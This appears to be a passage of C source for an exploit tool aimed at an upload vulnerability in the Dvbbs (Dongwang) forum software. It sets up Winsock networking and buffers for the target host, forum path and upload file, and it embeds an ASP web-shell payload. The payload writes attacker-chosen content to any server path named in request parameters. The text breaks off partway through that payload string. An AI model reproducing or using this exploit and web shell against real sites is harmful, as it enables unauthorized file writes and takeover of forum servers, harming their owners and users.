动网论坛上传文件漏洞(6) #include <winsock2.h> #include <stdio.h> #include "Resource.h"
#pragma comment(lib,"ws2_32.lib")
HINSTANCE g_hInst; HWND g_hWnd; HWND m_up; HWND m_host; HWND m_webpath; HWND m_path; HWND m_filename; HWND m_upload; DWord m_theadid; BYTE sendbuf[10000]; char host[80]; //主机地址 char bbspath[50]; //论坛地址 char uppath[20]; //上传目录 char upfilename[50]; //上传文件名 char upfiledata[8000]; //上传文件内容 int sendsize; //总传送数据大小 int realsndsize = 0; //传送页面文件的大小 char snddata[8000]; char mm[1000]= "<%dim objFSO%>\r\n" "<%dim fdata%>\r\n" "<%dim objCountFile%>\r\n" "<%on error resume next%>\r\n" "<%Set objFSO = Server.CreateObject(\"Scripting.FileSystemObject\")%>\r\n" "<%if Trim(request(\"syfdpath\"))<>\"\" then%>\r\n" "<%fdata = request(\"cyfddata\")%>\r\n" "<%Set objCountFile=objFSO.CreateTextFile(request(\"syfdpath\"),True)%>\r\n" "<%objCountFile.Write fdata%>\r\n" "<%if err =0 then%>\r\n" "<%response.write \"<font color=red>save Success!</font>\"%>\r\n" "<%else%>" "<%response.write \"<font color=red>Save UnSuccess!</font>\"%>\r\n"
